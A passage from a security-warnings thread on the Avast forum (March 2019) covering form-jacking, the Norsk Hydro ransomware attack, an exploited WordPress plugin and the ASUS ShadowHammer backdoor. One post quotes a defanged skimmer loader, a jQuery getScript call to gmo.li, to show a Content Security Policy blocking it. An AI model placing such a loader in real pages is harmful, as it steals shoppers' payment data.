Author Topic: SECURITY WARNINGS & Notices - Please post them here  (Read 2860864 times)

0 Members and 4 Guests are viewing this topic.

Offline Asyn

  • Avast Überevangelist
  • Certainly Bot
  • *****
  • Posts: 76037
    • >>>  Avast Forum - Deutschsprachiger Bereich  <<<
W8.1 [x64] - Avast Free AV 23.3.8047.BC [UI.757] - Firefox ESR 102.9 [NS/uBO/PB] - Thunderbird 102.9.1
Avast-Tools: Secure Browser 109.0 - Cleanup 23.1 - SecureLine 5.18 - DriverUpdater 23.1 - CCleaner 6.01
Avast Wissenswertes (Downloads, Anleitungen & Infos): https://forum.avast.com/index.php?topic=60523.0

Offline polonus

  • Avast Überevangelist
  • Probably Bot
  • *****
  • Posts: 33891
  • malware fighter
Re: SECURITY WARNINGS & Notices - Please post them here
« Reply #5851 on: March 16, 2019, 04:17:07 PM »
Many webshops fall victim to form-jacking
Think of the Magecart campaign and recently
https://www.group-ib.com/media/js-sniffer/
Quote
payment data of thousands of customers of UK and US online stores could have been compromised
Quote
It is loading the script from gmo.li using a jQuery getScript call, so a properly constructed CSP would have blocked it. Tested using one of my own CSP protected sites. See result here:


$.getScript('hxtp://gmo.li/js.php?r=008353')

Content Security Policy: The page’s settings blocked the loading of a resource at hxtp://gmo.li/js.php?r=008353&_=1552623429549 (“default-src”).


Implementing CSP on someone else's code would be really tough.
info credits go to foxonsafari.

polonus
Cybersecurity is more of an attitude than anything else. Avast Evangelists.

Use NoScript, a limited user account and a virtual machine and be safe(r)!

Offline polonus

  • Avast Überevangelist
  • Probably Bot
  • *****
  • Posts: 33891
  • malware fighter
Re: SECURITY WARNINGS & Notices - Please post them here
« Reply #5852 on: March 19, 2019, 03:14:12 PM »
One of the biggest Aluminium producers hit by ransomeware.
https://newsweb.oslobors.no/message/472389
Various factories inside EU and USA have been hit:
https://www.nrk.no/norge/hydro-utsatt-for-dataangrep_-_--ikke-opplevd-lignende-1.14479736
Norse Security Services are investigating:
https://twitter.com/NSM_no/status/1107945689491931137

polonus
Cybersecurity is more of an attitude than anything else. Avast Evangelists.

Use NoScript, a limited user account and a virtual machine and be safe(r)!

Offline Pondus

  • Probably Bot
  • ****
  • Posts: 37506
  • Not a avast user

Offline DavidR

  • Avast Überevangelist
  • Certainly Bot
  • *****
  • Posts: 88895
  • No support PMs thanks
Re: SECURITY WARNINGS & Notices - Please post them here
« Reply #5854 on: March 19, 2019, 05:31:10 PM »
One of the biggest Aluminium producers hit by ransomeware.
https://newsweb.oslobors.no/message/472389
Various factories inside EU and USA have been hit:
https://www.nrk.no/norge/hydro-utsatt-for-dataangrep_-_--ikke-opplevd-lignende-1.14479736
Norse Security Services are investigating:
https://twitter.com/NSM_no/status/1107945689491931137

polonus
In English   https://www.newsinenglish.no/2019/03/19/hydro-comes-under-major-cyber-attack/

If this does nothing else, it should show business has to isolate critical systems and have a robust backup and recovery strategy.  Assuming they have an IT department.
Windows 10 Home 64bit/ Acer Aspire F15/ Intel Core i5 7200U 2.5GHz, 8GB DDR4 memory, 256GB SSD, 1TB HDD/ avast! free 24.2.6105 (build 24.2.8918.824) UI 1.0.799/ Firefox, uBlock Origin, uMatrix/ MailWasher Pro/ Avast! Mobile Security

Offline polonus

  • Avast Überevangelist
  • Probably Bot
  • *****
  • Posts: 33891
  • malware fighter
Re: SECURITY WARNINGS & Notices - Please post them here
« Reply #5855 on: March 22, 2019, 12:15:14 AM »
WordPress sites under attack via vulnerable plug-in: https://wordpress.org/plugins/easy-wp-smtp/#developers
Attacks ongoing since March 15th: https://blog.nintechnet.com/critical-0day-vulnerability-fixed-in-wordpress-easy-wp-smtp-plugin/
Update the plug-in in question: https://www.wordfence.com/blog/2019/03/hackers-abusing-recently-patched-vulnerability-in-easy-wp-smtp-plugin/

polonus (volunteer 3rd party cold reconnaissance website security analyst and website error-hunter)

Cybersecurity is more of an attitude than anything else. Avast Evangelists.

Use NoScript, a limited user account and a virtual machine and be safe(r)!

Offline markspectrum-mgt.com

  • Newbie
  • *
  • Posts: 1
Re: SECURITY WARNINGS & Notices - Please post them here
« Reply #5856 on: March 22, 2019, 12:44:31 AM »
Not sure if this is the correct thread but I am getting warnings on a few sites I manage:
hxxp://best-home-security-systems.com/
hxxps://homesecuritysystems-local.com/
hxxp://californiahomesecuritysystems.com/

The message:
Warning
This site could have harmed your computer
Get me out of here

Any info would be appreciated.

Offline bob3160

  • Avast Überevangelist
  • Probably Bot
  • *****
  • Posts: 48523
  • 64 Years of Happiness
    • bob3160 Protecting Yourself, Your Computer and, Your Identity
Re: SECURITY WARNINGS & Notices - Please post them here
« Reply #5857 on: March 22, 2019, 12:51:54 AM »
Not sure if this is the correct thread but I am getting warnings on a few sites I manage:
hxxp://best-home-security-systems.com/
hxxps://homesecuritysystems-local.com/
hxxp://californiahomesecuritysystems.com/

The message:
Warning
This site could have harmed your computer
Get me out of here

Any info would be appreciated.
Report a URL
https://www.avast.com/report-a-url.php
Free Security Seminar: https://bit.ly/bobg2023  -  Important: http://www.organdonor.gov/ -- My Web Site: http://bob3160.strikingly.com/ - Win 11 Pro v22H2 64bit, 16 Gig Ram, 1TB SSD, Avast Free 23.5.6066, How to Successfully Install Avast http://goo.gl/VLXdeRepair & Clean Install https://goo.gl/t7aJGq -- My Online Activity https://bit.ly/BobGInternet


Offline Pondus

  • Probably Bot
  • ****
  • Posts: 37506
  • Not a avast user
Re: SECURITY WARNINGS & Notices - Please post them here
« Reply #5859 on: March 26, 2019, 08:11:53 AM »
Can Avast detect this?
https://www.tomsguide.com/us/chinese-hackers-asus-kaspersky,news-29722.html
https://motherboard.vice.com/en_us/article/pan9wn/hackers-hijacked-asus-software-updates-to-install-backdoors-on-thousands-of-computers
https://www.virustotal.com/#/file/bebb16193e4b80f4bc053e4fa818aa4e2832885392469cd5b8ace5cec7e4ca19/detection



Kaspersky  https://securelist.com/operation-shadowhammer/89992/
Quote
We’ve also created a tool which can be run to determine if your computer has been one of the surgically selected targets of this attack. To check this, it compares MAC addresses of all adapters to a list of predefined values hardcoded in the malware and alerts if a match was found.




Offline bob3160

  • Avast Überevangelist
  • Probably Bot
  • *****
  • Posts: 48523
  • 64 Years of Happiness
    • bob3160 Protecting Yourself, Your Computer and, Your Identity
Re: SECURITY WARNINGS & Notices - Please post them here
« Reply #5860 on: March 26, 2019, 02:17:52 PM »
Can Avast detect this?
https://www.tomsguide.com/us/chinese-hackers-asus-kaspersky,news-29722.html
https://motherboard.vice.com/en_us/article/pan9wn/hackers-hijacked-asus-software-updates-to-install-backdoors-on-thousands-of-computers
https://www.virustotal.com/#/file/bebb16193e4b80f4bc053e4fa818aa4e2832885392469cd5b8ace5cec7e4ca19/detection



Kaspersky  https://securelist.com/operation-shadowhammer/89992/
Quote
We’ve also created a tool which can be run to determine if your computer has been one of the surgically selected targets of this attack. To check this, it compares MAC addresses of all adapters to a list of predefined values hardcoded in the malware and alerts if a match was found.
The simple answer is Yes. I certainly wouldn't suggest downloading a tool from Kaspersky in light of the fact that Avast detects this malware. :)
Free Security Seminar: https://bit.ly/bobg2023  -  Important: http://www.organdonor.gov/ -- My Web Site: http://bob3160.strikingly.com/ - Win 11 Pro v22H2 64bit, 16 Gig Ram, 1TB SSD, Avast Free 23.5.6066, How to Successfully Install Avast http://goo.gl/VLXdeRepair & Clean Install https://goo.gl/t7aJGq -- My Online Activity https://bit.ly/BobGInternet

Offline ehmen

  • Poster
  • *
  • Posts: 498
Re: SECURITY WARNINGS & Notices - Please post them here
« Reply #5861 on: March 26, 2019, 03:51:30 PM »
The simple answer is Yes. I certainly wouldn't suggest downloading a tool from Kaspersky in light of the fact that Avast detects this malware. :)
So if a Avast scan is done and the results is clean it means the computer isn't infected or affected by any of this?

Offline bob3160

  • Avast Überevangelist
  • Probably Bot
  • *****
  • Posts: 48523
  • 64 Years of Happiness
    • bob3160 Protecting Yourself, Your Computer and, Your Identity
Re: SECURITY WARNINGS & Notices - Please post them here
« Reply #5862 on: March 26, 2019, 03:59:52 PM »
Correct. :)
Free Security Seminar: https://bit.ly/bobg2023  -  Important: http://www.organdonor.gov/ -- My Web Site: http://bob3160.strikingly.com/ - Win 11 Pro v22H2 64bit, 16 Gig Ram, 1TB SSD, Avast Free 23.5.6066, How to Successfully Install Avast http://goo.gl/VLXdeRepair & Clean Install https://goo.gl/t7aJGq -- My Online Activity https://bit.ly/BobGInternet

Offline Pondus

  • Probably Bot
  • ****
  • Posts: 37506
  • Not a avast user
Re: SECURITY WARNINGS & Notices - Please post them here
« Reply #5863 on: March 26, 2019, 04:30:02 PM »
Correct. :)
Partly correct

You can still have one of the network adapter listed, you may have one made by Asus even if not running a Asus computer


« Last Edit: March 26, 2019, 04:33:16 PM by Pondus »

Offline ehmen

  • Poster
  • *
  • Posts: 498
Re: SECURITY WARNINGS & Notices - Please post them here
« Reply #5864 on: March 26, 2019, 06:22:37 PM »
You can still have one of the network adapter listed, you may have one made by Asus even if not running a Asus computer
Please explain what you mean.